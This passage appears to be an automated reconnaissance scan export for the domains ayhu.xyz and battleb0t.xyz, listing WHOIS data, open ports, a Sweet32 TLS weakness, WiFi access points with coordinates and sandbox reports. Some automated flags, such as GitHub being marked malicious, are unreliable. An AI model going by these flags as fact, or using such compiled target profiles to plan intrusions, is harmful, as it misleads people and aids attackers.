u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': | 185.199.111.153 |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:8080 | 188.114.96.0/24 |
| 2023-05-12 02:45:56 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Ashburn', u'security': {u'is_vpn': False}, u'city_geoname_id': 4744870, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'AMAZON-AES', u'isp_name': u'Amazon.com, Inc.', u'organization_name': u'Amazon Technologies Inc', u'autonomous_system_number': 14618}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20149', u'longitude': -77.4903, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:45:55'}, u'latitude': 39.0469, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2600:1f18:2489:8201::c8', u'continent': u'North America', u'region_iso_code': u'VA'} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UnitedStatesOfSmash (Net ID: F8:F5:32:A5:DE:80) | 37.751, -97.822 |
| 2023-05-12 03:04:11 | Malicious Co-Hosted Site | Yes | abuse.ch | 0 | 1 | 2 | 0 | None | abuse.ch URLhaus (Domain) [www.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | www.github.com |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | nuke.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:31:EF:16) | 37.7642, -122.3993 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0C:41:F9:92:AD) | 39.0469, -77.4903 |
| 2023-05-12 02:53:45 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8002::153:80 | 2606:50c0:8002::153 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ahu.xyz | ayhu.xyz |
| 2023-05-12 02:54:10 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c570c285af722f3-ORD
Content-Encoding: gzip
| 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myjoey (Net ID: 00:0C:41:D4:C9:9B) | 39.0469, -77.4903 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DTLAMN5 (Net ID: 00:01:9F:20:3C:A4) | 34.0544, -118.244 |
| 2023-05-12 02:46:23 | Netblock Membership | No | RIPE | 8 | 0 | 2 | 0 | None | 185.199.108.0/24 | 185.199.108.153 |
| 2023-05-12 03:11:22 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 207.154.228.169 |
| 2023-05-12 03:09:26 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 | 188.114.96.1 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007ayong.github.io]
https://www.openphish.com/feed.txt | 007ayong.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_4.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:45:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [Hybrid Analysis raw sandbox report omitted] | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip Wavelan (Net ID: 00:02:2D:01:79:94) | 37.780462,-122.390564 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | United States | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | github.com | github.com |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-th.github.io | 185.199.111.153 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | [Censys raw host record omitted] |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Tech Overdrive (Net ID: 00:0B:6C:BB:FB:4A) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:14:48 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | www.ayhu.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="[base64 challenge token omitted]">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:50:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.bloknmesh.com/de-de/categories/geschlossene-bauzaune', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"109.237.26.201:443"\n "142.250.189.170:443"\n "142.251.46.232:443"\n "185.199.110.153:443"\n "142.250.191.78:443"\n "142.251.2.157:443"\n "142.250.189.162:443"\n "142.250.189.206:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.bloknmesh.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_be0_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_be0_IESQMMUTEX_0_331"\n "IsoScope_be0_ConnHashTable<3040>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3040"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_be0_IESQMMUTEX_0_303"\n "IsoScope_be0_IE_EarlyTabStart_0xdc0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_be0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "gb_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarF14F.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabF14E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF1B0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF18F.tmp" has type "Microsoft Cabinet archive data Windows 
2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF23E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF13C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"menu_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "country-select-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "nl_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "at_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "angle-left-small-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "direct-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-mobile_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "hire-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "installation-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube_1_.svg" has type "SVG Scalable Vector Graphics 
image"- [targetUID: N/A]\n "be_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "de_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "twitter_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-toggle-close_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "country-toggle-close_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.bloknmesh.com/de-de/categories/geschlossene-bauzaune"\n Pattern match: "https://www.bloknmesh.com"\n Pattern match: "www.bloknmesh.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.bloknmesh.com" seems to be random'}], u'threat_level': 0, u'size': None, u'job_id': u'63eb580a656d4508501f7ddd', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', 
u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'109.237.26.201', u'142.250.189.170', u'142.251.46.232', u'185.199.110.153', u'142.250.191.78', u'142.251.2.157', u'142.250.189.162', u'142.250.189.206', u'142.251.46.227'], u'sha256': u'ffc86eb014a73c210623dbd4f36139a11c64b837621251d40584904dd7208526', u'sha512': u'1c3d667eabb07aa2a138edbfa8d3804ddede4abce94c0a69545d2046db978c501505db13ae264fef10d8c1b02ba750ecff6d74d3be180c96b659ba1f3db1ce6d', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.bloknmesh.com/de-de/categories/geschlossene-bauzaune', u'submission_id': u'63eb580a656d4508501f7dde', u'created_at': u'2023-02-14T09:44:42+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-14T09:44:43+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 9, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'05fe3e8314ad9f8079b7f8e333a310e7', u'network_mode': u'default', u'processes': [], u'sha1': u'9d87d6dc6afb474f596750e0f7fcfbc195ed29dd', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, 
u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'www.bloknmesh.com'], u'extracted_files': [], u'type_short': []}] | 185.199.110.153 |
